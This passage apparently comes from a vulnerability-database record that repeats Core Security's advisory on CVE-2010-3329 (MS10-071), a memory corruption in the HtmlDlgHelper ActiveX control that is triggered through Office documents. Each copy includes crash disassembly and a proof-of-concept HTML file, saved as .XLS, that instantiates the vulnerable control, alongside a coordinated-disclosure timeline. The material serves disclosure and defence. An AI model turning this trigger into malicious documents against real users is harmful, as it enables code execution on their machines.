that he would prefer to see the \nbug fixed rather than relying on mitigations that prevent exploitation. \n \n. 2010-06-15: \nCore adds the following information: in Office 2003 even if the user \nanswers No to the ActiveX dialog, the application ends up crashing. \n \n. 2010-06-16: \nVendor responds that it is currently investigating the new information. \n \n. 2010-06-28: \nVendor informs that it has found that the vulnerable code actually \nexists and is owned by the IE team whom is currently investigating the \ncrash; and that this case is transferred over to them (and to a new case \nmanager as well). \n \n. 2010-07-02: \nVendor informs Core that the IE team has finished the investigation into \nthis issue and was able to reproduce the issue reported. During the \ninvestigation it was determined that this is an exploitable crash in \nInternet Explorer. Vendor will send Core the list of affected Internet \nExplorer versions when available. \n \n. 2010-07-02: \nCore acknowledges receipt of the update, and reminds that although the \nvulnerable code is owned by the IE team this also affects Office \n(including 2010). Core offers to postpone publication of its advisory \nfrom July 13th to August 10th on the basis of a firm commitment to a \nrelease date from the vendor's side. Core informs that it is evaluating \nthe possibility of using Office killbit recently introduced by MS10-036 \nas a workaround, but that MS10-036 points to a knowledge base article \n[2] that is no longer available. \n \n. 2010-07-07: \nVendor acknowledges previous mail, and states that it will determine \nwith the product team how this fix could be included in the August \nrelease. Vendor requests an updated version of the advisory, and to \ninclude a vendor statement. \n \n. 2010-07-22: \nCore requests an update on the status of the vulnerability report; and \ninforms that publication of its advisory has been rescheduled to August \n10, 2010, despite the fact that Core did not receive any updates. Core \ninforms that the publication of this advisory is transferred to a new \ncase manager. \n \n. 2010-08-04: \nCore sends an updated version of the advisory and also asks if MSRC can \nprovide: \n1. The list of affected software versions. \n2. The CVE number assigned to this vulnerability (if it exists). \n3. The steps to reproduce the vulnerability in IE [3]. \n4. The link to the knowledge base article about the newly introduced \nOffice killbit given that Core is investigating using that defense \nmechanism as a workaround but MS10-036 points to a knowledge base \narticle that is no longer available \n([http://support.microsoft.com/kb/983632]). \n \nCore also notifies this advisory is currently scheduled to be published \non August 10, 2010 but the publication can be reviewed if Microsoft \nresponds with a firm commitment to a release date of fixes, and \ntechnical information about the root cause of this vulnerability. \n \n. 2010-08-04: \nMSRC responds that the updated advisory draft was internally forwarded \nand they are working on collecting answers to the requested questions. \n \n. 2010-08-05: \nMSRC sends the answers to the asked questions: \n1. The affected versions of Internet Explorer are IE6 [4], IE7 and IE8. \n2. MSRC is unable to assign a CVE as it is too early. CVEs are \ntypically assigned closer to the scheduled release date and MSRC will \nreceive the block of CVEs from Mitre for the October release of the \nInternet Explorer security update. \n3. MSRC notifies there is no attack vector in IE, and they cannot \nprovide steps to reproduce the vulnerability in IE. \n4. The knowledge base article about the newly introduced Office \nkillbit was redirected to [http://support.microsoft.com/kb/2252664]. \n \n. 2010-08-06: \nCore asks MSRC to clarify if the fix for this issue has been scheduled \nto be released in October. \n \n. 2010-08-06: \nMSRC confirms that the fix for this issue is scheduled for the October \nrelease of IE. \n \n. 2010-08-09: \nCore re-schedules the publication of the advisory for October 12 and \nnotifies that this date should be considered as final, if Microsoft does \nnot release fixes on that date, the advisory will be released as 'user \nrelease'. \n \n. 2010-08-09: \nMSRC confirms that the fix for this issue is scheduled for the October \nrelease of IE. \n \n. 2010-10-01: \nMSRC provides a status update about this issue and notifies that it is \nslated to be included in the October release of the IE Cumulative Update \nand SafeHTML update scheduled for October 12, 2010. MSRC also notifies \nthat the CVE assigned to this issue is CVE-2010-3329. \n \n. 2010-10-01: \nMSRC notifies that they have made a mistake and included an invalid \ndetail in the last status update. In particular, the issue does not \naffect the SafeHTML update scheduled for October but it will be shipping \nin the IE Cumulative Update scheduled for October. \n \n. 2010-10-01: \nCore acknowledges the MSRC's e-mail and notifies that although the \nproblem is located in IE-owned code, the problem also affects Office up \nto 2010. Core assumes this will be specified in the MSRC bulletin and \nasks for confirmation. \n \n. 2010-10-04: \nMSRC confirms that the description of the vulnerability calls out that \nthe vector to the vulnerability is through opening a word document. \n \n. 2010-10-12: \nAdvisory CORE-2010-0517 is published. \n \n \n9. *References* \n \n[1] Microsoft security bulletin summary for October 2010 - \n[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx]. \n[2] Office killbit [http://support.microsoft.com/kb/983632]. \n[3] This bug was originally investigated in Microsoft Office by Core, \nbut MSRC determined [2010-07-02] that this bug is an exploitable crash \nin Internet Explorer. \n[4] MSRC was not able to reproduce this issue on IE6, however they \nnotifies the code has been determined to exist in this version and the \nfix will be scoped to address this platform as well. \n \n \n10. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \n[http://corelabs.coresecurity.com/]. \n \n \n11. *About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \n[http://www.coresecurity.com]. \n \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2010 Core Security \nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] \n \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. \n \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/94815/CORE-2010-0517.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)", "cvss3": {}, "published": "2010-10-16T00:00:00", "type": "exploitpack", "title": "Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3329"], "modified": "2010-10-16T00:00:00", "id": "EXPLOITPACK:33AAE8F01A606FEF492A3296C19EC99F", "href": "", "sourceData": "Core Security Technologies - CoreLabs Advisory\n http://corelabs.coresecurity.com\n\n Microsoft Office HtmlDlgHelper class memory corruption\n\n\n1. *Advisory Information*\n\nTitle: Microsoft Office HtmlDlgHelper class memory corruption\nAdvisory Id: CORE-2010-0517\nAdvisory URL:\n[http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption]\nDate published: 2010-10-12\nDate of last update: 2010-10-14\nVendors contacted: Microsoft\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Missing Initialization [CWE-456]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2010-3329\nBugtraq ID: N/A\n\n\n3. *Vulnerability Description*\n\nMicrosoft Windows is prone to a memory corruption vulnerability when\ninstantiating the 'HtmlDlgHelper Class Object' in a Microsoft Office\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\nInternet Explorer ('mshtmled.dll'). This vulnerability could be used by\na remote attacker to execute arbitrary code with the privileges of the\nuser that opened the malicious file.\n\n\n4. *Vulnerable packages*\n\n . IE 6\n . IE 7\n . IE 8\n . MS Office XP\n . MS Office 2003\n . MS Office 2007 and MS Office 2010 (the control is disabled by default)\n\n\n5. *Non-vulnerable packages*\n\n . For further information and patches about this issue look at the\nMicrosoft Security Bulletin Summary for October 2010 [1], patch ms10-071.\n\n\n6. *Credits*\n\nThis vulnerability was discovered by Damian Frizza from Core Security\nTechnologies.\n\n\n7. *Technical Description / Proof of Concept Code*\n\nMicrosoft Windows is prone to a memory corruption vulnerability when\ninstantiating the 'HtmlDlgHelper Class Object'\n('CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b') in a Microsoft Office\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\nInternet Explorer ('mshtmled.dll'). The vulnerability occurs in\n'mshtmled.dll' when the destructor of the 'CHtmlDlgHelper' class is\ncalled and then makes access to uninitialized memory.\n\nThe ActiveX control is marked as \"Not Safe for Initialization\", and\nprompts the user with: \"ActiveX controls might contain viruses or other\nsecurity hazards. Do not enable this content unless you trust the source\nof this file\". However, in Office 2003 the bug is triggered even if the\nuser answers \"No\" to the prompt.\n\nThe following code is where the vulnerability occurs, when opening a\n.XLS document on Microsoft Office Excel 2003 ('mshtmled.dll'\nv8.0.6001.18702):\n\n/-----\nmshtmled!ReleaseInterface:\n42b919c0 8bff mov edi,edi\n42b919c2 55 push ebp\n42b919c3 8bec mov ebp,esp\n42b919c5 8b4508 mov eax,dword ptr [ebp+8]\nss:0023:0013d104=00310065\n42b919c8 85c0 test eax,eax\n42b919ca 7406 je mshtmled!ReleaseInterface+0x12\n(42b919d2) [br=0]\n42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065\n42b919ce 50 push eax\n42b919cf ff5108 call dword ptr [ecx+8] \nds:0023:7d02029c=2a2c277a\n\neax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc\nedi=00000000\neip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na\npe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00000206\n\nStack Trace:\n<Unloaded_ion.dll>+0x2a2c2779\nmshtmled!ReleaseInterface+0x12\nmshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting\ndestructor'+0xd\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27\nVBE6!rtcStrConvVar+0xbd65\nVBE6!rtcSetDatabaseLcid+0xa823\nEXCEL!Ordinal41+0xd2ad0\nEXCEL!Ordinal41+0x14082a\nUSER32!CallWindowProcW+0x1b\nInstruction Address: 0x000000002a2c277a\n-----/\n\n\nThe following html code demonstrates the bug on Excel 2002/2003. Save\nthe file as .XLS and open it on Excel.\n\n/-----\n<html xmlns:v=\"urn:schemas-microsoft-com:vml\"\nxmlns:o=\"urn:schemas-microsoft-com:office:office\"\nxmlns:x=\"urn:schemas-microsoft-com:office:excel\">\n\n<head>\n<meta http-equiv=Content-Type content=\"text/html; charset=windows-1252\">\n<meta name=ProgId content=Excel.Sheet>\n<meta name=Generator content=\"Microsoft Excel 10\">\n<!--[if !mso]>\n<style>\nv\\:* {behavior:url(#default#VML);}\no\\:* {behavior:url(#default#VML);}\nx\\:* {behavior:url(#default#VML);}\n.shape {behavior:url(#default#VML);}\n</style>\n<![endif]--><!--[if gte mso 9]><xml>\n <o:DocumentProperties>\n <o:LastAuthor>TEST</o:LastAuthor>\n <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>\n <o:Version>10.6858</o:Version>\n </o:DocumentProperties>\n <o:OfficeDocumentSettings>\n <o:DownloadComponents/>\n </o:OfficeDocumentSettings>\n</xml><![endif]-->\n\n<!--[if gte mso 9]><xml>\n <x:ExcelWorkbook>\n <x:ExcelWorksheets>\n <x:ExcelWorksheet>\n <x:Name>test</x:Name>\n <x:WorksheetOptions>\n <x:CodeName>Sheet1</x:CodeName>\n <x:Selected/>\n <x:DoNotDisplayGridlines/>\n <x:ProtectContents>False</x:ProtectContents>\n <x:ProtectObjects>False</x:ProtectObjects>\n <x:ProtectScenarios>False</x:ProtectScenarios>\n </x:WorksheetOptions>\n </x:ExcelWorksheet>\n </x:ExcelWorksheets>\n <x:WindowHeight>9345</x:WindowHeight>\n <x:WindowWidth>13260</x:WindowWidth>\n <x:WindowTopX>240</x:WindowTopX>\n <x:WindowTopY>60</x:WindowTopY>\n <x:ProtectStructure>False</x:ProtectStructure>\n <x:ProtectWindows>False</x:ProtectWindows>\n </x:ExcelWorkbook>\n</xml><![endif]--><!--[if gte mso 9]><xml>\n <o:shapedefaults v:ext=\"edit\" spidmax=\"1026\"/>\n</xml><![endif]--><!--[if gte mso 9]><xml>\n <o:shapelayout v:ext=\"edit\">\n <o:idmap v:ext=\"edit\" data=\"1\"/>\n </o:shapelayout></xml><![endif]-->\n</head>\n\n<body link=blue vlink=purple>\n\n<table x:str border=0 cellpadding=0 cellspacing=0 width=64\nstyle='border-collapse:\n collapse;table-layout:fixed;width:48pt'>\n <col width=64 style='width:48pt'>\n <tr height=17 style='height:12.75pt'>\n <td height=17 width=64 style='height:12.75pt;width:48pt' align=left\n valign=top><!--[if gte vml 1]><v:shapetype id=\"_x0000_t201\"\ncoordsize=\"21600,21600\"\n o:spt=\"201\" path=\"m,l,21600r21600,l21600,xe\">\n <v:stroke joinstyle=\"miter\"/>\n <v:path shadowok=\"f\" o:extrusionok=\"f\" strokeok=\"f\" fillok=\"f\"\n o:connecttype=\"rect\"/>\n <o:lock v:ext=\"edit\" shapetype=\"t\"/>\n </v:shapetype><v:shape id=\"_x0000_s1025\" type=\"#_x0000_t201\"\nstyle='position:absolute;\n margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'\n strokecolor=\"windowText [64]\" o:insetmode=\"auto\">\n <![if gte mso 9]><o:title=\"\"/>\n <![endif]><x:ClientData ObjectType=\"Pict\">\n <x:SizeWithCells/>\n <x:CF>Pict</x:CF>\n <x:AutoPict/>\n </x:ClientData>\n </v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;\n position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;\n height:17px'><![endif]>\n\n<object classid=\"CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B\"\nid=obj></object>\n\n<![if !vml]></span><![endif]><span\n style='mso-ignore:vglayout2'>\n <table cellpadding=0 cellspacing=0>\n <tr>\n <td height=17 width=64 style='height:12.75pt;width:48pt'></td>\n </tr>\n </table>\n </span></td>\n </tr>\n <![if supportMisalignedColumns]>\n <tr height=0 style='display:none'>\n <td width=64 style='width:48pt'></td>\n </tr>\n <![endif]>\n</table>\n</body>\n</html>\n\n-----/\n\n\nThis exploitable condition was reproduced in the following versions of\n'mshtmled.dll':\n\n . 'mshtmled.dll' v8.0.6001.18702\n . 'mshtmled.dll' v8.0.6001.18000\n . 'mshtmled.dll' v7.0.6000.17023\n . 'mshtmled.dll' v7.0.6000.17080\n\n\n8. *Report Timeline*\n\n. 2010-05-28:\nInitial notification to the vendor. Draft advisory and proof-of-concept\nfiles sent to MSRC. Publication date set for July 13, 2010.\n\n. 2010-06-11:\nCore requests from the vendor an update on the status of this case.\n\n. 2010-06-14:\nThe vendor responds that its engineers are still investigating this\nissue; and that they expect to have more information from the\ninvestigation and triage process within the next few days.\n\n. 2010-06-15:\nThe vendors informs that they have been determined that the ActiveX\ncontrol is marked as \"Not Safe for Initialization\"; and prompts the user\nwith a dialog that warns the user that they are going to be executing a\npotentially malicious code. In consequence, the vendor treats this case\nas the same scenario as a user that tries to enable and open an Office\ndocument with a Macro or VBA code contained within.\n\n. 2010-06-15:\nCore asks the vendor if the previous mail means that it does not intent\nto fix the bug or that it does not recognize it as a security issue. The\nreporter's viewpoint is that a dialog prompt is not a fix \"per se\" and\njust a defense in depth mechanism; and that he would prefer to see the\nbug fixed rather than relying on mitigations that prevent exploitation.\n\n. 2010-06-15:\nCore adds the following information: in Office 2003 even if the user\nanswers No to the ActiveX dialog, the application ends up crashing.\n\n. 2010-06-16:\nVendor responds that it is currently investigating the new information.\n\n. 2010-06-28:\nVendor informs that it has found that the vulnerable code actually\nexists and is owned by the IE team whom is currently investigating the\ncrash; and that this case is transferred over to them (and to a new case\nmanager as well).\n\n. 2010-07-02:\nVendor informs Core that the IE team has finished the investigation into\nthis issue and was able to reproduce the issue reported. During the\ninvestigation it was determined that this is an exploitable crash in\nInternet Explorer. Vendor will send Core the list of affected Internet\nExplorer versions when available.\n\n. 2010-07-02:\nCore acknowledges receipt of the update, and reminds that although the\nvulnerable code is owned by the IE team this also affects Office\n(including 2010). Core offers to postpone publication of its advisory\nfrom July 13th to August 10th on the basis of a firm commitment to a\nrelease date from the vendor's side. Core informs that it is evaluating\nthe possibility of using Office killbit recently introduced by MS10-036\nas a workaround, but that MS10-036 points to a knowledge base article\n[2] that is no longer available.\n\n. 2010-07-07:\nVendor acknowledges previous mail, and states that it will determine\nwith the product team how this fix could be included in the August\nrelease. Vendor requests an updated version of the advisory, and to\ninclude a vendor statement.\n\n. 2010-07-22:\nCore requests an update on the status of the vulnerability report; and\ninforms that publication of its advisory has been rescheduled to August\n10, 2010, despite the fact that Core did not receive any updates. Core\ninforms that the publication of this advisory is transferred to a new\ncase manager.\n\n. 2010-08-04:\nCore sends an updated version of the advisory and also asks if MSRC can\nprovide:\n 1. The list of affected software versions.\n 2. The CVE number assigned to this vulnerability (if it exists).\n 3. The steps to reproduce the vulnerability in IE [3].\n 4. The link to the knowledge base article about the newly introduced\nOffice killbit given that Core is investigating using that defense\nmechanism as a workaround but MS10-036 points to a knowledge base\narticle that is no longer available\n([http://support.microsoft.com/kb/983632]).\n\n Core also notifies this advisory is currently scheduled to be published\non August 10, 2010 but the publication can be reviewed if Microsoft\nresponds with a firm commitment to a release date of fixes, and\ntechnical information about the root cause of this vulnerability.\n\n. 2010-08-04:\nMSRC responds that the updated advisory draft was internally forwarded\nand they are working on collecting answers to the requested questions.\n\n. 2010-08-05:\nMSRC sends the answers to the asked questions:\n 1. The affected versions of Internet Explorer are IE6 [4], IE7 and IE8.\n 2. MSRC is unable to assign a CVE as it is too early. CVEs are\ntypically assigned closer to the scheduled release date and MSRC will\nreceive the block of CVEs from Mitre for the October release of the\nInternet Explorer security update.\n 3. MSRC notifies there is no attack vector in IE, and they cannot\nprovide steps to reproduce the vulnerability in IE.\n 4. The knowledge base article about the newly introduced Office\nkillbit was redirected to [http://support.microsoft.com/kb/2252664].\n\n. 2010-08-06:\nCore asks MSRC to clarify if the fix for this issue has been scheduled\nto be released in October.\n\n. 2010-08-06:\nMSRC confirms that the fix for this issue is scheduled for the October\nrelease of IE.\n\n. 2010-08-09:\nCore re-schedules the publication of the advisory for October 12 and\nnotifies that this date should be considered as final, if Microsoft does\nnot release fixes on that date, the advisory will be released as 'user\nrelease'.\n\n. 2010-08-09:\nMSRC confirms that the fix for this issue is scheduled for the October\nrelease of IE.\n\n. 2010-10-01:\nMSRC provides a status update about this issue and notifies that it is\nslated to be included in the October release of the IE Cumulative Update\nand SafeHTML update scheduled for October 12, 2010. MSRC also notifies\nthat the CVE assigned to this issue is CVE-2010-3329.\n\n. 2010-10-01:\nMSRC notifies that they have made a mistake and included an invalid\ndetail in the last status update. In particular, the issue does not\naffect the SafeHTML update scheduled for October but it will be shipping\nin the IE Cumulative Update scheduled for October.\n\n. 2010-10-01:\nCore acknowledges the MSRC's e-mail and notifies that although the\nproblem is located in IE-owned code, the problem also affects Office up\nto 2010. Core assumes this will be specified in the MSRC bulletin and\nasks for confirmation.\n\n. 2010-10-04:\nMSRC confirms that the description of the vulnerability calls out that\nthe vector to the vulnerability is through opening a word document.\n\n. 2010-10-12:\nAdvisory CORE-2010-0517 is published.\n\n\n9. *References*\n\n[1] Microsoft security bulletin summary for October 2010 -\n[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx].\n[2] Office killbit [http://support.microsoft.com/kb/983632].\n[3] This bug was originally investigated in Microsoft Office by Core,\nbut MSRC determined [2010-07-02] that this bug is an exploitable crash\nin Internet Explorer.\n[4] MSRC was not able to reproduce this issue on IE6, however they\nnotifies the code has been determined to exist in this version and the\nfix will be scoped to address this platform as well.\n\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\n[http://corelabs.coresecurity.com/].\n\n\n11. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\n[http://www.coresecurity.com].\n\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2010 Core Security\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\n\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-06-07T16:23:31", "description": "", "cvss3": {}, "published": "2010-10-16T00:00:00", "type": "exploitdb", "title": "Microsoft Office - 'HtmlDlgHelper' Class Memory Corruption (MS10-071)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2010-3329", "CVE-2010-3329"], "modified": "2010-10-16T00:00:00", "id": "EDB-ID:15262", "href": "https://www.exploit-db.com/exploits/15262", "sourceData": "Core Security Technologies - CoreLabs Advisory\n http://corelabs.coresecurity.com\n\n Microsoft Office HtmlDlgHelper class memory corruption\n\n\n1. *Advisory Information*\n\nTitle: Microsoft Office HtmlDlgHelper class memory corruption\nAdvisory Id: CORE-2010-0517\nAdvisory URL:\n[http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption]\nDate published: 2010-10-12\nDate of last update: 2010-10-14\nVendors contacted: Microsoft\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Missing Initialization [CWE-456]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2010-3329\nBugtraq ID: N/A\n\n\n3. *Vulnerability Description*\n\nMicrosoft Windows is prone to a memory corruption vulnerability when\ninstantiating the 'HtmlDlgHelper Class Object' in a Microsoft Office\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\nInternet Explorer ('mshtmled.dll'). This vulnerability could be used by\na remote attacker to execute arbitrary code with the privileges of the\nuser that opened the malicious file.\n\n\n4. *Vulnerable packages*\n\n . IE 6\n . IE 7\n . IE 8\n . MS Office XP\n . MS Office 2003\n . MS Office 2007 and MS Office 2010 (the control is disabled by default)\n\n\n5. *Non-vulnerable packages*\n\n . For further information and patches about this issue look at the\nMicrosoft Security Bulletin Summary for October 2010 [1], patch ms10-071.\n\n\n6. *Credits*\n\nThis vulnerability was discovered by Damian Frizza from Core Security\nTechnologies.\n\n\n7. *Technical Description / Proof of Concept Code*\n\nMicrosoft Windows is prone to a memory corruption vulnerability when\ninstantiating the 'HtmlDlgHelper Class Object'\n('CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b') in a Microsoft Office\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\nInternet Explorer ('mshtmled.dll'). The vulnerability occurs in\n'mshtmled.dll' when the destructor of the 'CHtmlDlgHelper' class is\ncalled and then makes access to uninitialized memory.\n\nThe ActiveX control is marked as \"Not Safe for Initialization\", and\nprompts the user with: \"ActiveX controls might contain viruses or other\nsecurity hazards. Do not enable this content unless you trust the source\nof this file\". However, in Office 2003 the bug is triggered even if the\nuser answers \"No\" to the prompt.\n\nThe following code is where the vulnerability occurs, when opening a\n.XLS document on Microsoft Office Excel 2003 ('mshtmled.dll'\nv8.0.6001.18702):\n\n/-----\nmshtmled!ReleaseInterface:\n42b919c0 8bff mov edi,edi\n42b919c2 55 push ebp\n42b919c3 8bec mov ebp,esp\n42b919c5 8b4508 mov eax,dword ptr [ebp+8]\nss:0023:0013d104=00310065\n42b919c8 85c0 test eax,eax\n42b919ca 7406 je mshtmled!ReleaseInterface+0x12\n(42b919d2) [br=0]\n42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065\n42b919ce 50 push eax\n42b919cf ff5108 call dword ptr [ecx+8]\nds:0023:7d02029c=2a2c277a\n\neax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc\nedi=00000000\neip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na\npe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\nefl=00000206\n\nStack Trace:\n<Unloaded_ion.dll>+0x2a2c2779\nmshtmled!ReleaseInterface+0x12\nmshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting\ndestructor'+0xd\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27\nVBE6!rtcStrConvVar+0xbd65\nVBE6!rtcSetDatabaseLcid+0xa823\nEXCEL!Ordinal41+0xd2ad0\nEXCEL!Ordinal41+0x14082a\nUSER32!CallWindowProcW+0x1b\nInstruction Address: 0x000000002a2c277a\n-----/\n\n\nThe following html code demonstrates the bug on Excel 2002/2003. Save\nthe file as .XLS and open it on Excel.\n\n/-----\n<html xmlns:v=\"urn:schemas-microsoft-com:vml\"\nxmlns:o=\"urn:schemas-microsoft-com:office:office\"\nxmlns:x=\"urn:schemas-microsoft-com:office:excel\">\n\n<head>\n<meta http-equiv=Content-Type content=\"text/html; charset=windows-1252\">\n<meta name=ProgId content=Excel.Sheet>\n<meta name=Generator content=\"Microsoft Excel 10\">\n<!--[if !mso]>\n<style>\nv\\:* {behavior:url(#default#VML);}\no\\:* {behavior:url(#default#VML);}\nx\\:* {behavior:url(#default#VML);}\n.shape {behavior:url(#default#VML);}\n</style>\n<![endif]--><!--[if gte mso 9]><xml>\n <o:DocumentProperties>\n <o:LastAuthor>TEST</o:LastAuthor>\n <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>\n <o:Version>10.6858</o:Version>\n </o:DocumentProperties>\n <o:OfficeDocumentSettings>\n <o:DownloadComponents/>\n </o:OfficeDocumentSettings>\n</xml><![endif]-->\n\n<!--[if gte mso 9]><xml>\n <x:ExcelWorkbook>\n <x:ExcelWorksheets>\n <x:ExcelWorksheet>\n <x:Name>test</x:Name>\n <x:WorksheetOptions>\n <x:CodeName>Sheet1</x:CodeName>\n <x:Selected/>\n <x:DoNotDisplayGridlines/>\n <x:ProtectContents>False</x:ProtectContents>\n <x:ProtectObjects>False</x:ProtectObjects>\n <x:ProtectScenarios>False</x:ProtectScenarios>\n </x:WorksheetOptions>\n </x:ExcelWorksheet>\n </x:ExcelWorksheets>\n <x:WindowHeight>9345</x:WindowHeight>\n <x:WindowWidth>13260</x:WindowWidth>\n <x:WindowTopX>240</x:WindowTopX>\n <x:WindowTopY>60</x:WindowTopY>\n <x:ProtectStructure>False</x:ProtectStructure>\n <x:ProtectWindows>False</x:ProtectWindows>\n </x:ExcelWorkbook>\n</xml><![endif]--><!--[if gte mso 9]><xml>\n <o:shapedefaults v:ext=\"edit\" spidmax=\"1026\"/>\n</xml><![endif]--><!--[if gte mso 9]><xml>\n <o:shapelayout v:ext=\"edit\">\n <o:idmap v:ext=\"edit\" data=\"1\"/>\n </o:shapelayout></xml><![endif]-->\n</head>\n\n<body link=blue vlink=purple>\n\n<table x:str border=0 cellpadding=0 cellspacing=0 width=64\nstyle='border-collapse:\n collapse;table-layout:fixed;width:48pt'>\n <col width=64 style='width:48pt'>\n <tr height=17 style='height:12.75pt'>\n <td height=17 width=64 style='height:12.75pt;width:48pt' align=left\n valign=top><!--[if gte vml 1]><v:shapetype id=\"_x0000_t201\"\ncoordsize=\"21600,21600\"\n o:spt=\"201\" path=\"m,l,21600r21600,l21600,xe\">\n <v:stroke joinstyle=\"miter\"/>\n <v:path shadowok=\"f\" o:extrusionok=\"f\" strokeok=\"f\" fillok=\"f\"\n o:connecttype=\"rect\"/>\n <o:lock 